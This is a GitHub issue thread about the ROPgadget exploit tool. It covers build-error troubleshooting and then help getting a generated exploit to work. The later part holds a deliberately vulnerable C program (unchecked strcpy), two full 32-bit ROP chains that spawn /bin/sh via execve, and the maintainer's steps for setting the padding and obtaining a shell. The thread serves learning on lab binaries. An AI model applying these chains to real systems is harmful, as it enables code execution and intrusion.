Do you have python3? If you don't have python3, it will not be able to make src/x8664/gadgets.c which is a required file.

I can't think of another reason this would be the case. Can you please attach the entire output of:

make cleanall && make all

Thanks.

from ropgadget.

I did install python3, but saw some different advice on how to do it. On my ubuntu system I did:

sudo apt-get install python3

I also modified the sym link for /usr/bin/python to point to python3

The alternative advice was to download and rebuild python 3 (it would end up in /opt/python3)... I did not do this method. Perhaps this is why I'm getting the error?

Here is the make clean:

rm -f ./src/main.o ./src/syntax.o ./src/search_gadgets.o ./src/opcode.o ./src/ropmaker.o ./src/maps.o ./src/real_string_stringmode.o ./src/varop.o ./src/filter.o ./src/parse_elf.o ./src/parse_pe.o ./src/binary.o ./src/makecode.o ./src/combo_ropmaker.o ./src/target.o ./src/xfunc.o ./src/x86/common_makecode.o ./src/x86/common_ropmaker.o ./src/x86/common_asm.o ./src/x8632/combo_ropmaker.o ./src/x8632/gadgets.o ./src/x8664/gadgets.o ./src/x8664/combo_ropmaker.o ./libs/libpe/pe.o ROPgadget

Here is the full make output:

gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/main.o src/main.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/syntax.o src/syntax.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/search_gadgets.o src/search_gadgets.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/opcode.o src/opcode.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/ropmaker.o src/ropmaker.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/maps.o src/maps.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/real_string_stringmode.o src/real_string_stringmode.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/varop.o src/varop.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/filter.o src/filter.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/parse_elf.o src/parse_elf.c
src/parse_elf.c: In function ‘process_elf’:
src/parse_elf.c:70:31: warning: ‘strtab’ may be used uninitialized in this function [-Wuninitialized]
src/parse_elf.c:53:9: note: ‘strtab’ was declared here
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/parse_pe.o src/parse_pe.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/binary.o src/binary.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/makecode.o src/makecode.c
src/makecode.c: In function ‘sc_print_raw_pop’:
src/makecode.c:150:16: warning: ‘word’ may be used uninitialized in this function [-Wuninitialized]
src/makecode.c:146:8: note: ‘word’ was declared here
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/combo_ropmaker.o src/combo_ropmaker.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/target.o src/target.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/xfunc.o src/xfunc.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/x86/common_makecode.o src/x86/common_makecode.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/x86/common_ropmaker.o src/x86/common_ropmaker.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/x86/common_asm.o src/x86/common_asm.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/x8632/combo_ropmaker.o src/x8632/combo_ropmaker.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/x8632/gadgets.o src/x8632/gadgets.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/x8664/gadgets.o src/x8664/gadgets.c
src/x8664/gadgets.c:1:0: warning: ISO C forbids an empty translation unit [-pedantic]
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o src/x8664/combo_ropmaker.o src/x8664/combo_ropmaker.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -c -o libs/libpe/pe.o libs/libpe/pe.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99 -o ROPgadget ./src/main.o ./src/syntax.o ./src/search_gadgets.o ./src/opcode.o ./src/ropmaker.o ./src/maps.o ./src/real_string_stringmode.o ./src/varop.o ./src/filter.o ./src/parse_elf.o ./src/parse_pe.o ./src/binary.o ./src/makecode.o ./src/combo_ropmaker.o ./src/target.o ./src/xfunc.o ./src/x86/common_makecode.o ./src/x86/common_ropmaker.o ./src/x86/common_asm.o ./src/x8632/combo_ropmaker.o ./src/x8632/gadgets.o ./src/x8664/gadgets.o ./src/x8664/combo_ropmaker.o ./libs/libpe/pe.o
./src/search_gadgets.o: In function search_gadgets': /home/ron/ROPgadget/src/search_gadgets.c:150: undefined reference totab_x8664'
./src/x86/common_ropmaker.o: In function x86_ropmaker': /home/ron/ROPgadget/src/x86/common_ropmaker.c:29: undefined reference totab_x8664'
collect2: ld returned 1 exit status
make: *** [ROPgadget] Error 1

from ropgadget.

Hi Allan,

I'm new to github, so wasn't sure of the best way to respond. I put a comment on github with the info you requested.

Ron

From: Allan Wirth [email protected]
To: JonathanSalwan/ROPgadget [email protected]
Cc: yorita [email protected]
Sent: Sunday, February 3, 2013 7:02 PM
Subject: Re: [ROPgadget] Undefined ref to tab_x8664 (#6)

Do you have python3? If you don't have python3, it will not be able to make src/x8664/gadgets.c which is a required file.
I can't think of another reason this would be the case. Can you please attach the entire output of:
make cleanall && make all
Thanks.
—
Reply to this email directly or view it on GitHub.

from ropgadget.

Hey,

As I said before, can you please try with make cleanall instead of make clean. This will remove the file that is generated by python3 so it will be regenerated with make all.

Also, as far as I know you don't want python to be a symlink to python3. This will almost certainly break many other unrelated things on your computer. For ropgadget you only need it to be called python3, which is standard. Just installing the python3 package should be sufficient.

from ropgadget.

Yes, sorry about that.... I tried the "make cleanall" and "make all". Also, reverted /usr/bin/python symlink back to the original python2.

I'm getting a Permission error on makex64gadgets.py now.

ron@ubuntu:~/ROPgadget$ make cleanall
rm -f ./src/main.o ./src/syntax.o ./src/search_gadgets.o ./src/opcode.o ./src/ropmaker.o ./src/maps.o ./src/real_string_stringmode.o ./src/varop.o ./src/filter.o ./src/parse_elf.o ./src/parse_pe.o ./src/binary.o ./src/makecode.o ./src/combo_ropmaker.o ./src/target.o ./src/xfunc.o ./src/x86/common_makecode.o ./src/x86/common_ropmaker.o ./src/x86/common_asm.o ./src/x8632/combo_ropmaker.o ./src/x8632/gadgets.o ./src/x8664/gadgets.o ./src/x8664/combo_ropmaker.o ./libs/libpe/pe.o ROPgadget
rm -f ./src/x8664/gadgets.c

ron@ubuntu:~/ROPgadget$ make all
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/main.o src/main.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/syntax.o src/syntax.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/search_gadgets.o src/search_gadgets.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/opcode.o src/opcode.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/ropmaker.o src/ropmaker.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/maps.o src/maps.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/real_string_stringmode.o src/real_string_stringmode.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/varop.o src/varop.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/filter.o src/filter.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/parse_elf.o src/parse_elf.c
src/parse_elf.c: In function ‘process_elf’:
src/parse_elf.c:70:31: warning: ‘strtab’ may be used uninitialized in this function [-Wuninitialized]
src/parse_elf.c:53:9: note: ‘strtab’ was declared here
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/parse_pe.o src/parse_pe.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/binary.o src/binary.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/makecode.o src/makecode.c
src/makecode.c: In function ‘sc_print_raw_pop’:
src/makecode.c:150:16: warning: ‘word’ may be used uninitialized in this function [-Wuninitialized]
src/makecode.c:146:8: note: ‘word’ was declared here
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/combo_ropmaker.o src/combo_ropmaker.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/target.o src/target.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/xfunc.o src/xfunc.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/x86/common_makecode.o src/x86/common_makecode.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/x86/common_ropmaker.o src/x86/common_ropmaker.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/x86/common_asm.o src/x86/common_asm.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/x8632/combo_ropmaker.o src/x8632/combo_ropmaker.c
gcc -W -Wall -Wextra -ansi -pedantic -D_BSD_SOURCE -D_POSIX_SOURCE -I./includes -I./libs/libpe -O2 -ggdb -std=c99   -c -o src/x8632/gadgets.o src/x8632/gadgets.c
script/makex64gadgets.py > src/x8664/gadgets.c
/bin/sh: 1: script/makex64gadgets.py: Permission denied
make: *** [src/x8664/gadgets.c] Error 126

ron@ubuntu:~/ROPgadget$ ls -l script/makex64gadgets.py
-rw-r--r-- 1 ron ron 4815 Feb  2 18:56 script/makex64gadgets.py

ron@ubuntu:/ROPgadget$ which python3
/usr/bin/python3
ron@ubuntu:/ROPgadget$ python3
Python 3.2.3 (default, Oct 19 2012, 20:10:41)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.

From: Allan Wirth [email protected]
To: JonathanSalwan/ROPgadget [email protected]
Cc: yorita [email protected]
Sent: Sunday, February 3, 2013 8:52 PM
Subject: Re: [ROPgadget] Undefined ref to tab_x8664 (#6)

Hey,
As I said before, can you please try with make cleanall instead of make clean. This will remove the file that is generated by python3 so it will be regenerated with make all.
Also, as far as I know you don't want python to be a symlink to python3. This will almost certainly break many other unrelated things on your computer. For ropgadget you only need it to be called python3, which is standard. Just installing the python3 package should be sufficient.
—
Reply to this email directly or view it on GitHub.

from ropgadget.

For some reason script/makex64gadgets.py has become non-executable? you should run chmod +x script/makex64gadgets.py to make it executable and then try again.

If you git clone'd the repo it should already be executable so I'm not sure why it wouldn't be.

from ropgadget.

Thanks Allan,

I'm not sure what happened, so I just went ahead and did another "git clone" and started over again.

It's working perfectly now. I appreciate your patience.

From: Allan Wirth [email protected]
To: JonathanSalwan/ROPgadget [email protected]
Cc: yorita [email protected]
Sent: Sunday, February 3, 2013 10:12 PM
Subject: Re: [ROPgadget] Undefined ref to tab_x8664 (#6)

For some reason script/makex64gadgets.py has become non-executable? you should run chmod +x script/makex64gadgets.py to make it executable and then try again.
If you git clone'd the repo it should already be executable so I'm not sure why it wouldn't be.
—
Reply to this email directly or view it on GitHub.

from ropgadget.

Hello,

I have been trying out your ROPgadget tool on my linux system. I created a simple c program with an obvious buffer exploit. I compiled it (as 32
bit w/-m32) and linked it statically to get a large attack surface for
gadgets. The tool produced the python script (see below).

I found your youtube video, but wasn't sure what you were modifying and
why. There is a step or two I'm missing to get the exploit working...
seems like I need to possibly alter the stack to return somewhere or
alter the stack pointer? If I simply run my executable with the python generated payload I get a segment error.

I can see the end of the payload is setting eax to 11 which is the
syscall for execve. I can also see /bin/sh in the payload, but not sure
why it is /bin/shA and I'm assuming some of the surrounding code is setting up the stack to point at this as one of the input arguments to execve.

Any suggestions would be appreciated.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int mybuff(int argc, char *argv[]) {
  char eyecatcher[] = "AAAAAAAA";
  char buff[80] = "!!!!";
 
  printf("Your input is %d long\n", strlen(argv[1]));
  strcpy(buff,argv[1]);
  return 0;
}

int main (int argc, char argv[]) {
   if (argc == 1) {
      printf("You need to provide input\n");
      exit(9);
   }
   mybuff(argc, argv);
   / made it back safely, show what the input was */
   printf("%s\n",argv[1]);
   return 0;
}

#!/usr/bin/python

execve generated by Ropgadget v4.0.0

from struct import pack

p = ''

Padding goes here

p += pack("<I", 0x0805b28a) # pop %edx ; ret
p += pack("<I", 0x080ee060) # @ .data
p += pack("<I", 0x080c1dc6) # pop %eax ; ret
p += "/bin" # /bin
p += pack("<I", 0x0808e37d) # mov %eax,(%edx) ; ret
p += pack("<I", 0x0805b28a) # pop %edx ; ret
p += pack("<I", 0x080ee064) # @ .data + 4
p += pack("<I", 0x080c1dc6) # pop %eax ; ret
p += "/shA" # /shA
p += pack("<I", 0x0808e37d) # mov %eax,(%edx) ; ret
p += pack("<I", 0x0805b28a) # pop %edx ; ret
p += pack("<I", 0x080ee067) # @ .data + 7
p += pack("<I", 0x0804ae80) # xor %eax,%eax ; ret
p += pack("<I", 0x0808e37d) # mov %eax,(%edx) ; ret
p += pack("<I", 0x080481ec) # pop %ebx ; ret
p += pack("<I", 0x080ee060) # @ .data
p += pack("<I", 0x080a41d3) # pop %ecx ; ret
p += pack("<I", 0x080ee067) # @ .data + 7
p += pack("<I", 0x0805b28a) # pop %edx ; ret
p += pack("<I", 0x080ee067) # @ .data + 7
p += pack("<I", 0x0804ae80) # xor %eax,%eax ; ret
p += pack("<I", 0x08099e7f) # inc %eax ; ret
p += pack("<I", 0x08099e7f) # inc %eax ; ret
p += pack("<I", 0x08099e7f) # inc %eax ; ret
p += pack("<I", 0x08099e7f) # inc %eax ; ret
p += pack("<I", 0x08099e7f) # inc %eax ; ret
p += pack("<I", 0x08099e7f) # inc %eax ; ret
p += pack("<I", 0x08099e7f) # inc %eax ; ret
p += pack("<I", 0x08099e7f) # inc %eax ; ret
p += pack("<I", 0x08099e7f) # inc %eax ; ret
p += pack("<I", 0x08099e7f) # inc %eax ; ret
p += pack("<I", 0x08099e7f) # inc %eax ; ret
p += pack("<I", 0x08049499) # int $0x80
print p

From: Allan Wirth [email protected]
To: JonathanSalwan/ROPgadget [email protected]
Cc: yorita [email protected]
Sent: Sunday, February 3, 2013 8:52 PM
Subject: Re: [ROPgadget] Undefined ref to tab_x8664 (#6)

Hey,
As I said before, can you please try with make cleanall instead of make clean. This will remove the file that is generated by python3 so it will be regenerated with make all.
Also, as far as I know you don't want python to be a symlink to python3. This will almost certainly break many other unrelated things on your computer. For ropgadget you only need it to be called python3, which is standard. Just installing the python3 package should be sufficient.
—
Reply to this email directly or view it on GitHub.

from ropgadget.

yorita, you need to add the proper padding in the python script where it says 'padding goes here'. The correct padding would be the number of characters necessary to overwrite all the memory up to the stored return address pointer. ROPgadget does not do this analysis or generate the padding itself.

from ropgadget.

Hey Allan,

Thanks, I've gone back and tried experimenting with the padding. When I'm in the debugger, I can look at the stack and I can see the return address, and exactly when the payload is just up next to the return address (segmentation fault). If I put in enough padding to exactly overly the return address I get Aborted (core dump):

   set_thread_area failed when setting up thread-local storage

Sorry to be so dense, but I just want to be sure: put in enough padding so the payload stops just short of the return addess (so in my case, the int $0X80 call which is 0x0804999 is next to the return address)?

I'm not understanding how the payload is actually being used since I'm not altering the original return address, and I'm also not messing with the stack pointer to fool the operating system.

Ron

From: Allan Wirth [email protected]
To: JonathanSalwan/ROPgadget [email protected]
Cc: yorita [email protected]
Sent: Tuesday, February 12, 2013 3:54 PM
Subject: Re: [ROPgadget] Undefined ref to tab_x8664 (#6)

yorita, you need to add the proper padding in the python script where it says 'padding goes here'. The correct padding would be the number of characters necessary to overwrite all the memory up to the stored return address pointer. ROPgadget does not do this analysis or generate the padding itself.
—
Reply to this email directly or view it on GitHub.

from ropgadget.

Ron,

The first line of the payload should be the new return address:

 p += pack("<I", 0x0805b28a) # pop %edx ; ret

from ropgadget.

Allan,

Ok, I just reran ROPgadget on my executable. The python script is below, and seems to place the padding before the

        p += pack("<I", 0x0805b29a) # pop %edx ; ret

Your youtube video script is different and had padding inside of the pack instructions. Do I have the wrong ROPgadget tool?

#!/usr/bin/python

execve generated by Ropgadget v4.0.0

from struct import pack

p = ''

Padding goes here

p += pack("<I", 0x0805b29a) # pop %edx ; ret
p += pack("<I", 0x080ee060) # @ .data
p += pack("<I", 0x080c1dd6) # pop %eax ; ret
p += "/bin" # /bin
p += pack("<I", 0x0808e38d) # mov %eax,(%edx) ; ret
p += pack("<I", 0x0805b29a) # pop %edx ; ret
p += pack("<I", 0x080ee064) # @ .data + 4
p += pack("<I", 0x080c1dd6) # pop %eax ; ret
p += "/shA" # /shA
p += pack("<I", 0x0808e38d) # mov %eax,(%edx) ; ret
p += pack("<I", 0x0805b29a) # pop %edx ; ret
p += pack("<I", 0x080ee067) # @ .data + 7
p += pack("<I", 0x0804ae90) # xor %eax,%eax ; ret
p += pack("<I", 0x0808e38d) # mov %eax,(%edx) ; ret
p += pack("<I", 0x080481ec) # pop %ebx ; ret
p += pack("<I", 0x080ee060) # @ .data
p += pack("<I", 0x080a41e3) # pop %ecx ; ret
p += pack("<I", 0x080ee067) # @ .data + 7
p += pack("<I", 0x0805b29a) # pop %edx ; ret
p += pack("<I", 0x080ee067) # @ .data + 7
p += pack("<I", 0x0804ae90) # xor %eax,%eax ; ret
p += pack("<I", 0x08099e8f) # inc %eax ; ret
p += pack("<I", 0x08099e8f) # inc %eax ; ret
p += pack("<I", 0x08099e8f) # inc %eax ; ret
p += pack("<I", 0x08099e8f) # inc %eax ; ret
p += pack("<I", 0x08099e8f) # inc %eax ; ret
p += pack("<I", 0x08099e8f) # inc %eax ; ret
p += pack("<I", 0x08099e8f) # inc %eax ; ret
p += pack("<I", 0x08099e8f) # inc %eax ; ret
p += pack("<I", 0x08099e8f) # inc %eax ; ret
p += pack("<I", 0x08099e8f) # inc %eax ; ret
p += pack("<I", 0x08099e8f) # inc %eax ; ret
p += pack("<I", 0x080494a9) # int $0x80
print p

From: Allan Wirth [email protected]
To: JonathanSalwan/ROPgadget [email protected]
Cc: yorita [email protected]
Sent: Tuesday, February 12, 2013 6:01 PM
Subject: Re: [ROPgadget] Undefined ref to tab_x8664 (#6)

Ron,
The first line of the payload should be the new return address:
p += pack("<I", 0x0805b28a) # pop %edx ; ret
—
Reply to this email directly or view it on GitHub.

from ropgadget.

Ron,

I am not sure what youtube video you are referring to.

As an example of the correct way of using ROPGadget, run ROPGadget on the file in binary-test called main_linux:

ROPGadget ./main_linux > out.py
chmod +x out.py

In the outputted python code, add padding right after the comment (you can find the right length for padding in CHEAT.txt):

 # Padding goes here
 p = "A"*36

Then run this script on main_linux and you should get a shell:

./main_linux "$(./out.py)"

For your executable the method should be almost exactly the same, except with a different value for the padding.

Let me know if you have any issues.

from ropgadget.

Hey Allan,

After looking at your binary-test files and using the debugger to see what your example I finally figured it out :-)

I appreciate your patience!

Ron

From: Allan Wirth [email protected]
To: JonathanSalwan/ROPgadget [email protected]
Cc: yorita [email protected]
Sent: Tuesday, February 12, 2013 6:22 PM
Subject: Re: [ROPgadget] Undefined ref to tab_x8664 (#6)

Ron,
I am not sure what youtube video you are referring to.
As an example of the correct way of using ROPGadget, run ROPGadget on the file in binary-test called main_linux. In the outputted python code, add padding right after the comment (you can find the right length for padding in CHEAT.txt):

Padding goes here p = "A"*36

Then run this script on main_linux and you should get a shell.
For your executable the method should be almost exactly the same, except with a different value for the padding.
—
Reply to this email directly or view it on GitHub.

from ropgadget.